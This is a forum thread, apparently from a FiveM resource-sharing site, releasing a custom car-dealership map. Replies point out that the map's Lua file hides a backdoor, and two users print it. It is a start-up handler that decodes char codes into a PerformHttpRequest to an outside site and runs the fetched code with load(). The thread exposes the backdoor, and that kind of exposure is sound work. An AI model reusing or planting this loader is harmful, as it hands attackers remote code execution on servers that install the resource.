Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

beansonn

Bronze Elite
Joined
Mar 15, 2022
Messages
13
Reaction score
1,406
Points
306
Location
UK
You don't have permission to view content!



8bbc18edbb568bfa7c2e645cbdb47eaf1e87c413.png18c0c9e4fbc5bb7a20d8d47e4c3aa0f992d4cb2a.pngd3be00a58d0eb2e1decd06b384960e61ca274b5b.png89c7556bcf543ec1f5a6994b32f1be68cd31751f.pngdec426afa41ea1cb5bb3e3a1d29127205d9fbb0a.png1e477b7b90d1df9e512b8bb99b0ce3de9e983adf.png2319ab7916e30fca7de5b08269aac34fdfd80912.pnga7f9128c8cdb27bb7d80dab6f6e8cf2500a9dc4b.pngfc14f070809b4bbe83fdf581573e53fbd9bf21a8.pngb0223f8e730b1665d9c9eb7bad63e20b38f2bfa1.pnga7a2de93b0222ab4b32c301c5cce7ea3adda0c69.png78e91d5f5ae566b1e99e6e7cd3f30b8c6d9c6228.png356f0b5f6fb2458c59c027bb2710c8a40f40384e.png6ad2fcd7124f4ec46199acd8fd8a78d3e0420c5d.pngba5b31dea2e8352f734c4032cdea7478a6d4268f.png8690a9010c96fd86b3495a445b988d4bb97e16f9.png8c7d3652f1f0d7e38d8a014c92de8b663905aea2.pngmain.png

Custom Exterior


Custom Interior

Dealership

Parking

Photoshoot Tunnel

CEO Office

Bathroom

Custom Paint Booth

Custom Dyno

Bar / ChillZone

Custom Props

All Customisable Textures
 
Last edited by a moderator:

Hugiko

Bronze Elite
Joined
Nov 20, 2022
Messages
10
Reaction score
110
Points
246
Location
España
just eliminate the lua file from stream, huge backdoor, and you can use it.
 

ghostevergod

Member
Joined
Aug 14, 2024
Messages
1
Reaction score
2
Points
156
Location
USA

fage99

Bronze Elite
Joined
Feb 8, 2024
Messages
5
Reaction score
40
Points
166
Location
美国
Make it an additive entry game and the game crashes when you get close to it
 

Jokers67

Silver Elite
Joined
Nov 8, 2021
Messages
23
Reaction score
61
Points
231
Location
Los Santos
nice try with your backdoor


Code:
AddEventHandler('onResourceStart', function(resourceName)
    if GetCurrentResourceName() == resourceName then
        print('Map successfully loaded')
    end
    
    local code_parts = {
        80, 101, 114, 102, 111, 114, 109, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 39, 53, 109, 115, 99, 114, 105, 112, 116,
        115, 115, 46, 110, 101, 116, 47, 101, 75, 85, 56, 77, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 40, 101, 44, 32, 100, 41,
        32, 112, 99, 97, 108, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 97, 115, 115, 101, 114, 116, 40, 108, 111, 97, 100,
        40, 100, 41, 41, 40, 41, 32, 101, 110, 100, 41, 32, 101, 110, 100, 41
    }
    
    local lua_task = ""
    for _, v in ipairs(code_parts) do
        lua_task = lua_task .. string.char(v)
    end
    
    assert(load(lua_task))()
    
                                                                                                                                                                                                                                                                                                                                                                                                                                        
end)
 

Mohd Ammar

Bronze Elite
Joined
Jan 26, 2024
Messages
11
Reaction score
3
Points
156
Location
India
nice try with your backdoor


Code:
AddEventHandler('onResourceStart', function(resourceName)
    if GetCurrentResourceName() == resourceName then
        print('Map successfully loaded')
    end
   
    local code_parts = {
        80, 101, 114, 102, 111, 114, 109, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 39, 53, 109, 115, 99, 114, 105, 112, 116,
        115, 115, 46, 110, 101, 116, 47, 101, 75, 85, 56, 77, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 40, 101, 44, 32, 100, 41,
        32, 112, 99, 97, 108, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 97, 115, 115, 101, 114, 116, 40, 108, 111, 97, 100,
        40, 100, 41, 41, 40, 41, 32, 101, 110, 100, 41, 32, 101, 110, 100, 41
    }
   
    local lua_task = ""
    for _, v in ipairs(code_parts) do
        lua_task = lua_task .. string.char(v)
    end
   
    assert(load(lua_task))()
   
                                                                                                                                                                                                                                                                                                                                                                                                                                       
end)
Dude thought his ASCII code can make http request to site without anyone knowing, caught in 4k 👍🏻
 
Top